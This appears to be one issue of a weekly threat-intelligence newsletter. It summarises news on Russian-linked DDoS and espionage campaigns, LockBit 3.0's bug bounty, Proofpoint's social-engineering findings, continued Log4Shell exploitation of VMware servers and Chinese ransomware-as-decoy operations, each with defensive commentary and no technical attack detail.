TRIAGE - Threat Reporting and Intelligence on Attacks and General Exploits #25
James Beal
Security Architect and Threat Intelligence Researcher, Aeterneus Intel Founder. TRIAGE'ing the evolving threat landscape to help Infosec Teams and Execs keep their organizations safe!
Howdy everyone, welcome to volume number 25 of TRIAGE Tuesday! First we look at the outward effects on the Russian/Ukraine conflict on other parts of the world and a great overview of general Russian hacking activity. Lockbit has come out with their latest version with a focus on a more corporate start up style system with a bug bounty program and some very large payouts! We pivot to email, a constant attack vector, and Proofpoint’s latest research into the on-going issues with attacks still getting through to end users. CISA dropped a warning that Log4Shell is still being exploited on VMWare systems that also serves as a perfect example of why patching needs to still be a fundamental priority to everyone as this is now over six months old and no systems exposed to the internet should still remain unpatched. We finish off the week with a look at more hacker attacks out of China, with their newest tactical choice to use ransomware to hide cyberespionage! Enjoy a closer look at all 5 stories below!
If you are not already, get this awesome weekly update delivered directly to your inbox! The?newsletter!
1. Lithuanian Government Issues DDoS Attack Alerts and Overview of Russian GRU and SVR Cyberespionage Campaigns 1H 2022
Overview:
1st link: Lithuania's National Cyber Security Center has warned of increasing distributed denial-of-service attacks directed against the nation's public authorities and its transport and financial sectors, which could lead to temporary service disruptions. A Telegram post attributes the DDoS attacks to a group called Cyber Spetsnaz, saying they are possibly retaliation for Lithuania's alleged blocking of vital supplies by road and rail from the Russian enclave of Kaliningrad. On Monday June 28, Reuters reported that the Russian Killnet group claimed responsibility for a DDoS attack on Lithuania.
2nd link: On 24 February 2022, Russia invaded Ukraine and these two well-known APT groups (among many others) have been busy launching widespread intelligence gathering intrusion campaigns to support the Russian government and Russian military.?This blog aims to leverage open source intelligence (OSINT) reports to highlight the recent publicly-known tactics, techniques, and procedures (TTPs) leveraged by these cyber adversaries in 1H 2022 and the significance of them. For many top enterprises, government organizations, and political entities, these hacking groups operating on behalf of the Russian GRU and SVR are priority threats whose capabilities is of the utmost concern.
TRIAGE: As we continue to see effects spread from the Russia/Ukraine conflict that continues to dominate the world news and so far shows no real signs of an end at this time, here we have two articles covering aspects of the repercussions. First we have news that DDoS attacks are being launched due to a third party, in this case Lithuania and the country’s response to Russian aggression. The second article is a very well written overview of Russia’s two main intelligence organizations and their responses in the cyber realm over the first half of the year so far into 2022. As we all try to keep up with events and protect ourselves and our organizations from harm, these again serve as detailed examples of the activity you should expect from nation state backed attack groups.
2.?LockBit adds a bug bounty program in its revamped ransomware-as-a-service operation
Overview: The highly active LockBit ransomware group released what it is calling “LockBit 3.0” over the weekend, and announced a bug bounty program that offers rewards for ways to improve the ransomware operation. Cybersecurity researchers have tracked a surge in LockBit activity over the last several months, and the group is poised to overtake Conti as the most prolific ransomware group in terms of publicly identified victims. Recent incidents attributed to the group include attacks on a Foxconn factory, a Canadian fighter jet training company, and a popular German library service. Although few details were provided about technical changes to the ransomware-as-a-service operation, the group said it was inviting all security researchers and hackers to participate in its bug bounty program, which allegedly offers rewards ranging from $1,000 to $1 million. The group is seeking website bugs, locker errors, and ideas to improve the group’s software, among other things. A $1 million bounty is reserved for discovering the true name of the affiliate program manager, known as LockBitSupp.
TRIAGE: If anyone was still wondering how commercialized and “professional” these APT and Ransomware groups were going to get, here we go with the latest example of a move to formalize these criminal organizations into a format that does not look much different than a new startup out of Israel or Silicon Valley in the U.S. The joke was made in an online infosec group chat earlier today while discussing this story that all they are really missing at this point is a look at their benefits package and finding out the 401k disbursements. We have seen previous attempts to normalize and portray this work as legitimate and here is another step towards that end as well. I doubt anyone reading this would ever actually consider it, but this does also serve as a good reminder in case you see it being discussed anywhere else that these are still felony level crimes to participate in anything like this bug bounty program and putting any faith or trust into getting paid from a criminal group is a silly notion by itself.
领英推荐
3. Proofpoint: Social engineering attacks slipping past users
Overview: Some of the most effective tricks used for social engineering attacks are being overlooked or underestimated. That's according to security vendor Proofpoint, whose 2022 Social Engineering report concluded that many companies mistakenly assume that cybercriminals are unwilling or unable to use tactics such as extended conversations, legitimate services and hijacked email threads in order to dupe their targets into opening malware and following phishing links.
TRIAGE: This article serves as a great reminder to discuss these kinds of topics with co-workers, anyone in management at your organization that could be targeted, but also the general public of your family and friends. Those of us in the trenches each and every day can get jaded on these subjects and think everyone already hears too much about them, but this is a perfect example of how these attacks continue to happen because security begins and ends with all users, and no amount of advanced security tooling is going to stop 100% of everything, twenty four hours a day, every day. The more users know about techniques, the more they can be aware which can mean the difference between a casual “who cares I click on everything” and the split second “ok, now this looks suspicious” that is the difference between a normal day and a very bad day of incident response discussions.
4.?CISA: Log4Shell exploits still being used to hack VMware servers
Overview: CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability. Attackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data. After its disclosure in December 2021, multiple threat actors began scanning for and exploiting unpatched systems, including state-backed hacking groups from China, Iran, North Korea, and Turkey, as well as several access brokers commonly used by ransomware gangs.
TRIAGE: Patching. It is still one of the fundamentals that does not get performed as often as it should and as fast as it should for general vulnerabilities, let alone something that can have a horrible impact on your entire organization like Log4Shell can if not corrected on any internet exposed systems. Here we have confirmation from CISA that multiple nation state hacking groups are using this exact vulnerability against a very popular target that exists in a very large number of organizations worldwide. Hopefully most of those orgs have now patched as they have had over six months to track down and patch or isolate these machines, but if you have any systems exposed, at this point you should consider them pwned and they need to be treated as hostile, not just patched and the sys admins move on.
5.?Chinese hackers use ransomware as decoy for cyber espionage
Overview: Two Chinese hacking groups conducting cyber espionage and stealing intellectual property from Japanese and western companies are deploying ransomware as a decoy to cover up their malicious activities. Threat analysts from Secureworks say that the use of ransomware in espionage operations is done to obscure their tracks, make attribution harder, and create a powerful distraction for defenders. Finally, the exfiltration of the sensitive information is masked as financially-motivated attacks, which isn't the case with Chinese government-sponsored threat groups.
TRIAGE: This is a good overview of the behavior, please also take a look at the link included in the article to the actual Secureworks report that lists all the technical details behind these attacks. We have discussed recently the uptick in activity researchers are finding coming out of China this year compared to the last several years where things have been rather quiet from official China backed APT groups. Here is another dangerous example where they are abusing the popular attack method of the week, ransomware, as a decoy cover for their actual intended targets of data for espionage purposes. Any company with intellectual property that would help to lift up China’s ability to skip years of research and development should have tools and people in place to defend against these exact types of attacks.
If you are not already, get this awesome weekly update delivered directly to your inbox! The?newsletter!